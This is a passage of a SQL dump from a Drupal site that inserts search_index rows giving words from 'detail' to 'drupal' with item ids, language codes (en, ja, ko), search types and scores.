('detail', 27, 'en', 'node_search', 0.810915),
('details', 3, 'en', 'help_search', 1),
('details', 3, 'ja', 'help_search', 1),
('details', 3, 'ko', 'help_search', 1),
('details', 23, 'en', 'help_search', 1),
('details', 23, 'ja', 'help_search', 1),
('details', 23, 'ko', 'help_search', 1),
('details', 37, 'en', 'help_search', 0.896076),
('details', 37, 'ja', 'help_search', 0.896076),
('details', 37, 'ko', 'help_search', 0.896076),
('details', 43, 'en', 'help_search', 0.860547),
('details', 43, 'ja', 'help_search', 0.860547),
('details', 43, 'ko', 'help_search', 0.860547),
('details', 62, 'en', 'node_search', 3.93972),
('details', 66, 'en', 'node_search', 4.94583),
('details', 75, 'en', 'help_search', 1),
('details', 75, 'ja', 'help_search', 1),
('details', 75, 'ko', 'help_search', 1),
('details', 91, 'en', 'help_search', 1),
('details', 91, 'ja', 'help_search', 1),
('details', 91, 'ko', 'help_search', 1),
('detection', 50, 'en', 'help_search', 73.9689),
('detection', 50, 'ja', 'help_search', 73.9689),
('detection', 50, 'ko', 'help_search', 73.9689),
('determination', 161, 'en', 'node_search', 1),
('determination', 168, 'en', 'node_search', 1),
('determination', 170, 'en', 'node_search', 1),
('determination', 171, 'en', 'node_search', 1),
('determination', 173, 'en', 'node_search', 1),
('determination', 175, 'en', 'node_search', 1),
('determination', 177, 'en', 'node_search', 1),
('determination', 178, 'en', 'node_search', 1),
('determination', 180, 'en', 'node_search', 1),
('determination', 184, 'en', 'node_search', 1),
('determination', 186, 'en', 'node_search', 1),
('determination', 189, 'en', 'node_search', 1),
('determination', 190, 'en', 'node_search', 28),
('determination', 191, 'en', 'node_search', 1),
('determination', 192, 'en', 'node_search', 1),
('determination', 193, 'en', 'node_search', 1),
('determination', 196, 'en', 'node_search', 28),
('determine', 29, 'en', 'help_search', 1),
('determine', 29, 'ja', 'help_search', 1),
('determine', 29, 'ko', 'help_search', 1),
('determine', 50, 'en', 'help_search', 1),
('determine', 50, 'ja', 'help_search', 1),
('determine', 50, 'ko', 'help_search', 1),
('determines', 29, 'en', 'help_search', 1),
('determines', 29, 'ja', 'help_search', 1),
('determines', 29, 'ko', 'help_search', 1),
('dev', 30, 'en', 'help_search', 1.83938),
('dev', 30, 'ja', 'help_search', 1.83938),
('dev', 30, 'ko', 'help_search', 1.83938),
('develop', 25, 'en', 'node_search', 1),
('develop', 193, 'en', 'node_search', 1),
('develop', 194, 'en', 'node_search', 1),
('develop', 195, 'en', 'node_search', 1),
('develop', 198, 'en', 'node_search', 1),
('developed', 23, 'en', 'node_search', 0.857458),
('development', 12, 'en', 'help_search', 4),
('development', 12, 'ja', 'help_search', 4),
('development', 12, 'ko', 'help_search', 4),
('development', 13, 'en', 'help_search', 4),
('development', 13, 'ja', 'help_search', 4),
('development', 13, 'ko', 'help_search', 4),
('development', 14, 'en', 'help_search', 4),
('development', 14, 'ja', 'help_search', 4),
('development', 14, 'ko', 'help_search', 4),
('development', 15, 'en', 'help_search', 4),
('development', 15, 'ja', 'help_search', 4),
('development', 15, 'ko', 'help_search', 4),
('development', 27, 'en', 'node_search', 1),
('development', 30, 'en', 'help_search', 16.539),
('development', 30, 'ja', 'help_search', 16.539),
('development', 30, 'ko', 'help_search', 16.539),
('development', 33, 'en', 'help_search', 1),
('development', 33, 'ja', 'help_search', 1),
('development', 33, 'ko', 'help_search', 1),
('development', 37, 'en', 'help_search', 3.4798),
('development', 37, 'ja', 'help_search', 3.4798),
('development', 37, 'ko', 'help_search', 3.4798),
('development', 70, 'en', 'help_search', 4),
('development', 70, 'ja', 'help_search', 4),
('development', 70, 'ko', 'help_search', 4),
('development', 72, 'en', 'help_search', 4.67026),
('development', 72, 'ja', 'help_search', 4.67026),
('development', 72, 'ko', 'help_search', 4.67026),
('development', 73, 'en', 'help_search', 8),
('development', 73, 'ja', 'help_search', 8),
('development', 73, 'ko', 'help_search', 8),
('development', 174, 'en', 'node_search', 1),
('development', 181, 'en', 'node_search', 1),
('development', 182, 'en', 'node_search', 1),
('development', 183, 'en', 'node_search', 1),
('development', 185, 'en', 'node_search', 1),
('development', 187, 'en', 'node_search', 1),
('development', 189, 'en', 'node_search', 1),
('development', 192, 'en', 'node_search', 1),
('device', 6, 'en', 'help_search', 2),
('device', 6, 'ja', 'help_search', 2),
('device', 6, 'ko', 'help_search', 2),
('device', 13, 'en', 'help_search', 1),
('device', 13, 'ja', 'help_search', 1),
('device', 13, 'ko', 'help_search', 1),
('device', 15, 'en', 'help_search', 1),
('device', 15, 'ja', 'help_search', 1),
('device', 15, 'ko', 'help_search', 1),
('deviceindependent', 6, 'en', 'help_search', 11),
('deviceindependent', 6, 'ja', 'help_search', 11),
('deviceindependent', 6, 'ko', 'help_search', 11),
('devices', 29, 'en', 'help_search', 0.96498),
('devices', 29, 'ja', 'help_search', 0.96498),
('devices', 29, 'ko', 'help_search', 0.96498),
('dfsdf', 206, 'ja', 'node_search', 1),
('dhabi', 18, 'en', 'node_search', 28),
('dhabi', 18, 'ko', 'node_search', 28),
('diagnose', 34, 'en', 'help_search', 2),
('diagnose', 34, 'ja', 'help_search', 2),
('diagnose', 34, 'ko', 'help_search', 2),
('dialog', 3, 'en', 'help_search', 2),
('dialog', 3, 'ja', 'help_search', 2),
('dialog', 3, 'ko', 'help_search', 2),
('did', 11, 'en', 'help_search', 2),
('did', 11, 'ja', 'help_search', 2),
('did', 11, 'ko', 'help_search', 2),
('difference', 120, 'en', 'node_search', 1),
('difference', 162, 'en', 'node_search', 1),
('differences', 14, 'en', 'help_search', 1),
('differences', 14, 'ja', 'help_search', 1),
('differences', 14, 'ko', 'help_search', 1),
('different', 6, 'en', 'help_search', 0.997306),
('different', 6, 'ja', 'help_search', 0.997306),
('different', 6, 'ko', 'help_search', 0.997306),
('different', 11, 'en', 'help_search', 2.99731),
('different', 11, 'ja', 'help_search', 2.99731),
('different', 11, 'ko', 'help_search', 2.99731),
('different', 20, 'en', 'help_search', 1),
('different', 20, 'ja', 'help_search', 1),
('different', 20, 'ko', 'help_search', 1),
('different', 30, 'en', 'help_search', 1.65177),
('different', 30, 'ja', 'help_search', 1.65177),
('different', 30, 'ko', 'help_search', 1.65177),
('different', 31, 'ja', 'help_search', 3.64749),
('different', 35, 'en', 'help_search', 1),
('different', 35, 'ja', 'help_search', 1),
('different', 35, 'ko', 'help_search', 1),
('different', 37, 'en', 'help_search', 1.95772),
('different', 37, 'ja', 'help_search', 1.95772),
('different', 37, 'ko', 'help_search', 1.95772),
('different', 69, 'en', 'help_search', 1),
('different', 69, 'ja', 'help_search', 1),
('different', 69, 'ko', 'help_search', 1),
('different', 93, 'en', 'help_search', 1),
('different', 93, 'ja', 'help_search', 1),
('different', 93, 'ko', 'help_search', 1),
('differentsized', 29, 'en', 'help_search', 0.968904),
('differentsized', 29, 'ja', 'help_search', 0.968904),
('differentsized', 29, 'ko', 'help_search', 0.968904),
('difficult', 42, 'en', 'help_search', 1),
('difficult', 42, 'ja', 'help_search', 1),
('difficult', 42, 'ko', 'help_search', 1),
('difficulties', 24, 'en', 'node_search', 1),
('difficultiesupon', 136, 'en', 'node_search', 1),
('dignity', 87, 'en', 'node_search', 1),
('diligence', 135, 'en', 'node_search', 1),
('diligent', 23, 'en', 'node_search', 1),
('diligently', 150, 'en', 'node_search', 1),
('dining', 8, 'en', 'node_search', 2),
('dining', 133, 'en', 'node_search', 1),
('diploma', 30, 'en', 'node_search', 1),
('direct', 162, 'en', 'node_search', 1),
('direction', 49, 'en', 'help_search', 4),
('direction', 49, 'ja', 'help_search', 4),
('direction', 49, 'ko', 'help_search', 4),
('directly', 22, 'en', 'help_search', 1),
('directly', 22, 'ja', 'help_search', 1),
('directly', 22, 'ko', 'help_search', 1),
('directly', 23, 'en', 'node_search', 1),
('directly', 29, 'en', 'help_search', 1),
('directly', 29, 'ja', 'help_search', 1),
('directly', 29, 'ko', 'help_search', 1),
('directly', 66, 'en', 'node_search', 0.927431),
('directly', 69, 'en', 'help_search', 0.953396),
('directly', 69, 'ja', 'help_search', 0.953396),
('directly', 69, 'ko', 'help_search', 0.953396),
('directories', 30, 'en', 'help_search', 1),
('directories', 30, 'ja', 'help_search', 1),
('directories', 30, 'ko', 'help_search', 1),
('directory', 14, 'en', 'help_search', 1),
('directory', 14, 'ja', 'help_search', 1),
('directory', 14, 'ko', 'help_search', 1),
('directory', 30, 'en', 'help_search', 4.53613),
('directory', 30, 'ja', 'help_search', 4.53613),
('directory', 30, 'ko', 'help_search', 4.53613),
('disable', 9, 'en', 'help_search', 21),
('disable', 9, 'ja', 'help_search', 21),
('disable', 9, 'ko', 'help_search', 21),
('disable', 18, 'en', 'help_search', 1),
('disable', 18, 'ja', 'help_search', 1),
('disable', 18, 'ko', 'help_search', 1),
('disable', 58, 'en', 'help_search', 2),
('disable', 58, 'ja', 'help_search', 2),
('disable', 58, 'ko', 'help_search', 2),
('disable', 66, 'en', 'help_search', 1),
('disable', 66, 'ja', 'help_search', 1),
('disabled', 7, 'en', 'help_search', 3.81358),
('disabled', 7, 'ja', 'help_search', 3.81358),
('disabled', 7, 'ko', 'help_search', 3.81358),
('disabled', 25, 'en', 'help_search', 4),
('disabled', 25, 'ja', 'help_search', 4),
('disabled', 26, 'en', 'help_search', 4),
('disabled', 26, 'ja', 'help_search', 4),
('disabled', 26, 'ko', 'help_search', 4),
('disabled', 42, 'en', 'help_search', 1),
('disabled', 42, 'ja', 'help_search', 1),
('disabled', 42, 'ko', 'help_search', 1),
('disabled', 74, 'en', 'help_search', 1),
('disabled', 74, 'ja', 'help_search', 1),
('disabled', 74, 'ko', 'help_search', 1),
('disabling', 9, 'en', 'help_search', 26),
('disabling', 9, 'ja', 'help_search', 26),
('disabling', 9, 'ko', 'help_search', 26),
('disabling', 36, 'en', 'help_search', 1),
('disabling', 36, 'ja', 'help_search', 1),
('disabling', 36, 'ko', 'help_search', 1),
('disabling', 42, 'en', 'help_search', 1),
('disabling', 42, 'ja', 'help_search', 1),
('disabling', 42, 'ko', 'help_search', 1),
('disabling', 58, 'en', 'help_search', 26),
('disabling', 58, 'ja', 'help_search', 26),
('disabling', 58, 'ko', 'help_search', 26),
('disabling', 66, 'en', 'help_search', 1),
('disabling', 66, 'ja', 'help_search', 1),
('disabling', 73, 'en', 'help_search', 26),
('disabling', 73, 'ja', 'help_search', 26),
('disabling', 73, 'ko', 'help_search', 26),
('disabling', 75, 'en', 'help_search', 1),
('disabling', 75, 'ja', 'help_search', 1),
('disabling', 75, 'ko', 'help_search', 1),
('discard', 91, 'en', 'help_search', 0.989021),
('discard', 91, 'ja', 'help_search', 0.98493),
('discard', 91, 'ko', 'help_search', 0.989021),
('discipline', 122, 'en', 'node_search', 1),
('discovery', 29, 'en', 'help_search', 1.98087),
('discovery', 29, 'ja', 'help_search', 1.98087),
('discovery', 29, 'ko', 'help_search', 1.98087),
('discussed', 11, 'en', 'help_search', 0.873132),
('discussed', 11, 'ja', 'help_search', 0.873132),
('discussed', 11, 'ko', 'help_search', 0.873132),
('discussion', 11, 'en', 'help_search', 1),
('discussion', 11, 'ja', 'help_search', 1),
('discussion', 11, 'ko', 'help_search', 1),
('disease', 31, 'en', 'node_search', 0.957226),
('display', 1, 'en', 'help_search', 4),
('display', 1, 'ja', 'help_search', 4),
('display', 1, 'ko', 'help_search', 4),
('display', 5, 'en', 'help_search', 9),
('display', 5, 'ja', 'help_search', 9),
('display', 5, 'ko', 'help_search', 9),
('display', 8, 'en', 'help_search', 1),
('display', 8, 'ja', 'help_search', 1),
('display', 8, 'ko', 'help_search', 1),
('display', 11, 'en', 'help_search', 1),
('display', 11, 'ja', 'help_search', 1),
('display', 11, 'ko', 'help_search', 1),
('display', 17, 'en', 'help_search', 5),
('display', 17, 'ja', 'help_search', 5),
('display', 17, 'ko', 'help_search', 5),
('display', 22, 'en', 'help_search', 0.997306),
('display', 22, 'ja', 'help_search', 0.997306),
('display', 22, 'ko', 'help_search', 0.997306),
('display', 23, 'en', 'help_search', 0.909743),
('display', 23, 'ja', 'help_search', 0.909743),
('display', 23, 'ko', 'help_search', 0.909743),
('display', 24, 'en', 'help_search', 1),
('display', 24, 'ja', 'help_search', 1),
('display', 24, 'ko', 'help_search', 1),
('display', 25, 'en', 'help_search', 37),
('display', 25, 'ja', 'help_search', 37),
('display', 26, 'en', 'help_search', 4),
('display', 26, 'ja', 'help_search', 4),
('display', 26, 'ko', 'help_search', 4),
('display', 27, 'en', 'help_search', 1),
('display', 27, 'ja', 'help_search', 1),
('display', 27, 'ko', 'help_search', 1),
('display', 36, 'en', 'help_search', 1),
('display', 36, 'ja', 'help_search', 1),
('display', 36, 'ko', 'help_search', 1),
('display', 42, 'en', 'help_search', 1),
('display', 42, 'ja', 'help_search', 1),
('display', 42, 'ko', 'help_search', 1),
('display', 43, 'en', 'help_search', 0.906287),
('display', 43, 'ja', 'help_search', 0.906287),
('display', 43, 'ko', 'help_search', 0.906287),
('display', 47, 'en', 'help_search', 1),
('display', 47, 'ja', 'help_search', 1),
('display', 47, 'ko', 'help_search', 1),
('display', 48, 'en', 'help_search', 1),
('display', 48, 'ja', 'help_search', 1),
('display', 48, 'ko', 'help_search', 1),
('display', 50, 'en', 'help_search', 2),
('display', 50, 'ja', 'help_search', 2),
('display', 50, 'ko', 'help_search', 2),
('display', 56, 'en', 'help_search', 1),
('display', 56, 'ja', 'help_search', 1),
('display', 56, 'ko', 'help_search', 1),
('display', 60, 'en', 'help_search', 1),
('display', 60, 'ja', 'help_search', 1),
('display', 60, 'ko', 'help_search', 1),
('display', 62, 'en', 'help_search', 2),
('display', 62, 'ja', 'help_search', 2),
('display', 62, 'ko', 'help_search', 2),
('display', 65, 'en', 'help_search', 1),
('display', 65, 'ja', 'help_search', 1),
('display', 65, 'ko', 'help_search', 1),
('display', 68, 'en', 'help_search', 1),
('display', 68, 'ja', 'help_search', 1),
('display', 68, 'ko', 'help_search', 1),
('display', 69, 'en', 'help_search', 1),
('display', 69, 'ja', 'help_search', 1),
('display', 69, 'ko', 'help_search', 1),
('display', 72, 'en', 'help_search', 3.68109),
('display', 72, 'ja', 'help_search', 3.68109),
('display', 72, 'ko', 'help_search', 3.68109),
('display', 73, 'en', 'help_search', 4),
('display', 73, 'ja', 'help_search', 4),
('display', 73, 'ko', 'help_search', 4),
('display', 79, 'en', 'help_search', 2),
('display', 79, 'ja', 'help_search', 2),
('display', 79, 'ko', 'help_search', 2),
('display', 80, 'en', 'help_search', 0.916736),
('display', 80, 'ja', 'help_search', 0.916736),
('display', 80, 'ko', 'help_search', 0.916736),
('display', 88, 'en', 'help_search', 38),
('display', 88, 'ja', 'help_search', 38),
('display', 88, 'ko', 'help_search', 38),
('display', 89, 'en', 'help_search', 1),
('display', 89, 'ja', 'help_search', 1),
('display', 89, 'ko', 'help_search', 1),
('display', 90, 'en', 'help_search', 2),
('display', 90, 'ja', 'help_search', 2),
('display', 90, 'ko', 'help_search', 2),
('display', 91, 'en', 'help_search', 30),
('display', 91, 'ja', 'help_search', 30),
('display', 91, 'ko', 'help_search', 30),
('display', 93, 'en', 'help_search', 13.1563),
('display', 93, 'ja', 'help_search', 13.1563),
('display', 93, 'ko', 'help_search', 13.1563),
('displayed', 1, 'en', 'help_search', 3),
('displayed', 1, 'ja', 'help_search', 3),
('displayed', 1, 'ko', 'help_search', 3),
('displayed', 2, 'en', 'help_search', 1),
('displayed', 2, 'ja', 'help_search', 1),
('displayed', 2, 'ko', 'help_search', 1),
('displayed', 7, 'en', 'help_search', 1.98902),
('displayed', 7, 'ja', 'help_search', 1.98902),
('displayed', 7, 'ko', 'help_search', 1.98902),
('displayed', 21, 'en', 'help_search', 11),
('displayed', 21, 'ja', 'help_search', 11),
('displayed', 21, 'ko', 'help_search', 11),
('displayed', 24, 'en', 'help_search', 1),
('displayed', 24, 'ja', 'help_search', 1),
('displayed', 24, 'ko', 'help_search', 1),
('displayed', 27, 'en', 'help_search', 1),
('displayed', 27, 'ja', 'help_search', 1),
('displayed', 27, 'ko', 'help_search', 1),
('displayed', 28, 'en', 'help_search', 1),
('displayed', 28, 'ja', 'help_search', 1),
('displayed', 28, 'ko', 'help_search', 1),
('displayed', 29, 'en', 'help_search', 2),
('displayed', 29, 'ja', 'help_search', 2),
('displayed', 29, 'ko', 'help_search', 2),
('displayed', 30, 'en', 'help_search', 1),
('displayed', 30, 'ja', 'help_search', 1),
('displayed', 30, 'ko', 'help_search', 1),
('displayed', 31, 'ja', 'help_search', 5.31879),
('displayed', 36, 'en', 'help_search', 1),
('displayed', 36, 'ja', 'help_search', 1),
('displayed', 36, 'ko', 'help_search', 1),
('displayed', 56, 'en', 'help_search', 3),
('displayed', 56, 'ja', 'help_search', 3),
('displayed', 56, 'ko', 'help_search', 3),
('displayed', 57, 'en', 'help_search', 2),
('displayed', 57, 'ja', 'help_search', 2),
('displayed', 57, 'ko', 'help_search', 2),
('displayed', 59, 'en', 'help_search', 2),
('displayed', 59, 'ja', 'help_search', 2),
('displayed', 59, 'ko', 'help_search', 2),
('displayed', 69, 'en', 'help_search', 1),
('displayed', 69, 'ja', 'help_search', 1),
('displayed', 69, 'ko', 'help_search', 1),
('displayed', 71, 'en', 'help_search', 4),
('displayed', 71, 'ja', 'help_search', 4),
('displayed', 71, 'ko', 'help_search', 4),
('displayed', 86, 'en', 'help_search', 1),
('displayed', 86, 'ja', 'help_search', 1),
('displayed', 86, 'ko', 'help_search', 1),
('displayed', 91, 'en', 'help_search', 2),
('displayed', 91, 'ja', 'help_search', 2),
('displayed', 91, 'ko', 'help_search', 2),
('displayed', 93, 'en', 'help_search', 1.89608),
('displayed', 93, 'ja', 'help_search', 1.89608),
('displayed', 93, 'ko', 'help_search', 1.89608),
('displaying', 25, 'ja', 'help_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('displayname', 86, 'en', 'help_search', 1),
('displayname', 86, 'ja', 'help_search', 1),
('displayname', 86, 'ko', 'help_search', 1),
('displays', 22, 'en', 'help_search', 1),
('displays', 22, 'ja', 'help_search', 1),
('displays', 22, 'ko', 'help_search', 1),
('displays', 43, 'en', 'help_search', 2),
('displays', 43, 'ja', 'help_search', 2),
('displays', 43, 'ko', 'help_search', 2),
('displays', 47, 'en', 'help_search', 1),
('displays', 47, 'ja', 'help_search', 1),
('displays', 47, 'ko', 'help_search', 1),
('displays', 48, 'en', 'help_search', 1),
('displays', 48, 'ja', 'help_search', 1),
('displays', 48, 'ko', 'help_search', 1),
('displays', 88, 'en', 'help_search', 4),
('displays', 88, 'ja', 'help_search', 4),
('displays', 88, 'ko', 'help_search', 4),
('displays', 89, 'en', 'help_search', 4),
('displays', 89, 'ja', 'help_search', 4),
('displays', 89, 'ko', 'help_search', 4),
('displays', 91, 'en', 'help_search', 4),
('displays', 91, 'ja', 'help_search', 4),
('displays', 91, 'ko', 'help_search', 4),
('displays', 93, 'en', 'help_search', 5),
('displays', 93, 'ja', 'help_search', 5),
('displays', 93, 'ko', 'help_search', 5),
('distinguished', 62, 'en', 'node_search', 1),
('distributed', 33, 'en', 'help_search', 1),
('distributed', 33, 'ja', 'help_search', 1),
('distributed', 33, 'ko', 'help_search', 1),
('district', 150, 'en', 'node_search', 1),
('dive', 62, 'en', 'node_search', 3.98922),
('divided', 7, 'en', 'node_search', 2),
('divided', 7, 'ko', 'node_search', 2),
('divided', 11, 'en', 'help_search', 1),
('divided', 11, 'ja', 'help_search', 1),
('divided', 11, 'ko', 'help_search', 1),
('divided', 31, 'ja', 'help_search', 2),
('divided', 35, 'en', 'help_search', 1),
('divided', 35, 'ja', 'help_search', 1),
('divided', 35, 'ko', 'help_search', 1),
('divided', 62, 'en', 'help_search', 1),
('divided', 62, 'ja', 'help_search', 1),
('divided', 62, 'ko', 'help_search', 1),
('division', 27, 'en', 'node_search', 0.722831),
('divisions', 31, 'ja', 'help_search', 1),
('documentation', 7, 'en', 'help_search', 9.711),
('documentation', 7, 'ja', 'help_search', 9.711),
('documentation', 7, 'ko', 'help_search', 9.711),
('documentation', 10, 'en', 'help_search', 11),
('documentation', 10, 'ja', 'help_search', 11),
('documentation', 10, 'ko', 'help_search', 11),
('documentation', 37, 'en', 'help_search', 27.7322),
('documentation', 37, 'ja', 'help_search', 27.7322),
('documentation', 37, 'ko', 'help_search', 27.7322),
('documentation', 44, 'en', 'help_search', 22),
('documentation', 44, 'ja', 'help_search', 22),
('documentation', 44, 'ko', 'help_search', 22),
('documentation', 68, 'en', 'help_search', 8.57154),
('documentation', 68, 'ja', 'help_search', 8.57154),
('documentation', 68, 'ko', 'help_search', 8.57154),
('documents', 35, 'en', 'help_search', 1),
('documents', 35, 'ja', 'help_search', 1),
('documents', 35, 'ko', 'help_search', 1),
('does', 23, 'en', 'help_search', 0.899454),
('does', 23, 'ja', 'help_search', 0.899454),
('does', 23, 'ko', 'help_search', 0.899454),
('does', 30, 'en', 'help_search', 1),
('does', 30, 'ja', 'help_search', 1),
('does', 30, 'ko', 'help_search', 1),
('does', 31, 'ja', 'help_search', 20),
('does', 71, 'en', 'help_search', 1),
('does', 71, 'ja', 'help_search', 1),
('does', 71, 'ko', 'help_search', 1),
('does', 72, 'en', 'help_search', 1),
('does', 72, 'ja', 'help_search', 1),
('does', 72, 'ko', 'help_search', 1),
('does', 92, 'en', 'help_search', 1),
('does', 92, 'ja', 'help_search', 1),
('does', 92, 'ko', 'help_search', 1),
('doing', 27, 'en', 'node_search', 0.931053),
('dokkai', 62, 'en', 'node_search', 1.77599),
('dollar', 5, 'en', 'node_search', 1),
('dollar', 5, 'ko', 'node_search', 1),
('domain', 50, 'en', 'help_search', 1),
('domain', 50, 'ja', 'help_search', 1),
('domain', 50, 'ko', 'help_search', 1),
('don', 1, 'en', 'node_search', 1),
('don', 3, 'en', 'node_search', 1.97286),
('don', 3, 'ko', 'node_search', 1.96498),
('don', 62, 'en', 'node_search', 0.857458),
('don', 66, 'en', 'node_search', 1),
('don', 67, 'ja', 'node_search', 2),
('don', 89, 'en', 'help_search', 1),
('don', 89, 'ja', 'help_search', 0.997306),
('don', 89, 'ko', 'help_search', 1),
('don', 98, 'en', 'node_search', 1),
('done', 25, 'ja', 'help_search', 1),
('done', 26, 'en', 'help_search', 1),
('done', 26, 'ja', 'help_search', 1),
('done', 26, 'ko', 'help_search', 1),
('done', 30, 'en', 'help_search', 0.736141),
('done', 30, 'ja', 'help_search', 0.736141),
('done', 30, 'ko', 'help_search', 0.736141),
('done', 45, 'en', 'help_search', 1),
('done', 45, 'ja', 'help_search', 1),
('done', 45, 'ko', 'help_search', 1),
('done', 61, 'en', 'help_search', 1),
('done', 61, 'ja', 'help_search', 1),
('done', 61, 'ko', 'help_search', 1),
('done', 70, 'en', 'help_search', 2),
('done', 70, 'ja', 'help_search', 2),
('done', 70, 'ko', 'help_search', 2),
('door', 192, 'en', 'node_search', 1),
('door', 194, 'en', 'node_search', 27),
('doors', 62, 'en', 'node_search', 0.813674),
('down', 66, 'en', 'help_search', 1),
('down', 66, 'ja', 'help_search', 1),
('download', 12, 'en', 'help_search', 1),
('download', 12, 'ja', 'help_search', 1),
('download', 12, 'ko', 'help_search', 1),
('download', 23, 'en', 'help_search', 1),
('download', 23, 'ja', 'help_search', 1),
('download', 23, 'ko', 'help_search', 1),
('download', 29, 'en', 'help_search', 22),
('download', 29, 'ja', 'help_search', 22),
('download', 29, 'ko', 'help_search', 22),
('download', 33, 'en', 'help_search', 12),
('download', 33, 'ja', 'help_search', 12),
('download', 33, 'ko', 'help_search', 12),
('download', 41, 'en', 'help_search', 2),
('download', 41, 'ja', 'help_search', 2),
('download', 41, 'ko', 'help_search', 2),
('download', 53, 'en', 'help_search', 1),
('download', 53, 'ja', 'help_search', 1),
('download', 53, 'ko', 'help_search', 1),
('download', 74, 'en', 'help_search', 1),
('download', 74, 'ja', 'help_search', 1),
('download', 74, 'ko', 'help_search', 1),
('downloaded', 29, 'en', 'help_search', 2),
('downloaded', 29, 'ja', 'help_search', 2),
('downloaded', 29, 'ko', 'help_search', 2),
('downloaded', 33, 'en', 'help_search', 2),
('downloaded', 33, 'ja', 'help_search', 2),
('downloaded', 33, 'ko', 'help_search', 2),
('downloaded', 49, 'en', 'help_search', 1),
('downloaded', 49, 'ja', 'help_search', 1),
('downloaded', 49, 'ko', 'help_search', 1),
('downloaded', 74, 'en', 'help_search', 1),
('downloaded', 74, 'ja', 'help_search', 1),
('downloaded', 74, 'ko', 'help_search', 1),
('downloaded', 77, 'en', 'help_search', 2),
('downloaded', 77, 'ja', 'help_search', 2),
('downloaded', 77, 'ko', 'help_search', 2),
('downloads', 41, 'en', 'help_search', 1),
('downloads', 41, 'ja', 'help_search', 1),
('downloads', 41, 'ko', 'help_search', 1),
('drag', 1, 'en', 'help_search', 1),
('drag', 1, 'ja', 'help_search', 1),
('drag', 1, 'ko', 'help_search', 1),
('drag', 23, 'en', 'help_search', 2.7113),
('drag', 23, 'ja', 'help_search', 2.7113),
('drag', 23, 'ko', 'help_search', 2.7113),
('drag', 25, 'en', 'help_search', 2),
('drag', 25, 'ja', 'help_search', 2),
('drag', 26, 'en', 'help_search', 2),
('drag', 26, 'ja', 'help_search', 2),
('drag', 26, 'ko', 'help_search', 2),
('drag', 28, 'en', 'help_search', 0.836446),
('drag', 28, 'ja', 'help_search', 0.836446),
('drag', 28, 'ko', 'help_search', 0.836446),
('drag', 48, 'en', 'help_search', 1),
('drag', 48, 'ja', 'help_search', 1),
('drag', 48, 'ko', 'help_search', 1),
('drag', 50, 'en', 'help_search', 0.997306),
('drag', 50, 'ja', 'help_search', 0.997306),
('drag', 50, 'ko', 'help_search', 0.997306),
('drag', 56, 'en', 'help_search', 1),
('drag', 56, 'ja', 'help_search', 1),
('drag', 56, 'ko', 'help_search', 1),
('drag', 58, 'en', 'help_search', 1),
('drag', 58, 'ja', 'help_search', 1),
('drag', 58, 'ko', 'help_search', 1),
('draganddrop', 42, 'en', 'help_search', 3),
('draganddrop', 42, 'ja', 'help_search', 3),
('draganddrop', 42, 'ko', 'help_search', 3),
('dragging', 23, 'en', 'help_search', 0.882818),
('dragging', 23, 'ja', 'help_search', 0.882818),
('dragging', 23, 'ko', 'help_search', 0.882818),
('dragging', 42, 'en', 'help_search', 1),
('dragging', 42, 'ja', 'help_search', 1),
('dragging', 42, 'ko', 'help_search', 1),
('drastic', 72, 'en', 'help_search', 1),
('drastic', 72, 'ja', 'help_search', 1),
('drastic', 72, 'ko', 'help_search', 1),
('dreams', 174, 'en', 'node_search', 1),
('dress', 66, 'en', 'node_search', 2),
('dress', 87, 'en', 'node_search', 1),
('driven', 27, 'en', 'node_search', 0.800068),
('dropdown', 10, 'en', 'help_search', 1),
('dropdown', 10, 'ja', 'help_search', 1),
('dropdown', 10, 'ko', 'help_search', 1),
('dropdown', 64, 'en', 'help_search', 1),
('dropdown', 64, 'ja', 'help_search', 1),
('dropdown', 64, 'ko', 'help_search', 1),
('dropdown', 89, 'en', 'help_search', 1),
('dropdown', 89, 'ja', 'help_search', 1),
('dropdown', 89, 'ko', 'help_search', 1),
('dropdown', 91, 'en', 'help_search', 2),
('dropdown', 91, 'ja', 'help_search', 2),
('dropdown', 91, 'ko', 'help_search', 2),
('dropped', 67, 'en', 'help_search', 1),
('dropped', 67, 'ja', 'help_search', 1),
('dropped', 67, 'ko', 'help_search', 1),
('drug', 31, 'en', 'node_search', 0.968904),
('drupal', 2, 'en', 'help_search', 11),
('drupal', 2, 'ja', 'help_search', 11),
('drupal', 2, 'ko', 'help_search', 11),
('drupal', 6, 'en', 'help_search', 10.363),
('drupal', 6, 'ja', 'help_search', 10.363),
('drupal', 6, 'ko', 'help_search', 10.363),
('drupal', 29, 'en', 'help_search', 20.2472),
('drupal', 29, 'ja', 'help_search', 20.2472),
('drupal', 29, 'ko', 'help_search', 20.2472),
('drupal', 30, 'en', 'help_search', 22.041),
('drupal', 30, 'ja', 'help_search', 22.041),
('drupal', 30, 'ko', 'help_search', 22.041),
('drupal', 32, 'en', 'help_search', 21.0603),
('drupal', 32, 'ja', 'help_search', 21.0603),
('drupal', 32, 'ko', 'help_search', 21.0603),
('drupal', 33, 'en', 'help_search', 22),
('drupal', 33, 'ja', 'help_search', 22),
('drupal', 33, 'ko', 'help_search', 22),
('drupal', 34, 'en', 'help_search', 22),
('drupal', 34, 'ja', 'help_search', 22),
('drupal', 34, 'ko', 'help_search', 22),
('drupal', 36, 'en', 'help_search', 11),
('drupal', 36, 'ja', 'help_search', 11),
('drupal', 36, 'ko', 'help_search', 11),
('drupal', 38, 'en', 'help_search', 23),
('drupal', 38, 'ja', 'help_search', 23),
('drupal', 38, 'ko', 'help_search', 23),
('drupal', 59, 'en', 'help_search', 21.8496),
('drupal', 59, 'ja', 'help_search', 21.8496),
('drupal', 59, 'ko', 'help_search', 21.8496),
('drupal', 60, 'en', 'help_search', 22),
('drupal', 60, 'ja', 'help_search', 22),
('drupal', 60, 'ko', 'help_search', 22),
('drupal', 61, 'en', 'help_search', 20.8086),
('drupal', 61, 'ja', 'help_search', 20.8086),
('drupal', 61, 'ko', 'help_search', 20.8086),
('drupal', 63, 'en', 'help_search', 11),
('drupal', 63, 'ja', 'help_search', 11),
('drupal', 63, 'ko', 'help_search', 11),
('drupal', 65, 'en', 'help_search', 11),
('drupal', 65, 'ja', 'help_search', 11),
('drupal', 65, 'ko', 'help_search', 11),
('drupal', 70, 'en', 'help_search', 11),
('drupal', 70, 'ja', 'help_search', 11),
('drupal', 70, 'ko', 'help_search', 11),
('drupal', 76, 'en', 'help_search', 11),
('drupal', 76, 'ja', 'help_search', 11),
('drupal', 76, 'ko', 'help_search', 11),
('drupal', 79, 'en', 'help_search', 11),
('drupal', 79, 'ja', 'help_search', 11),
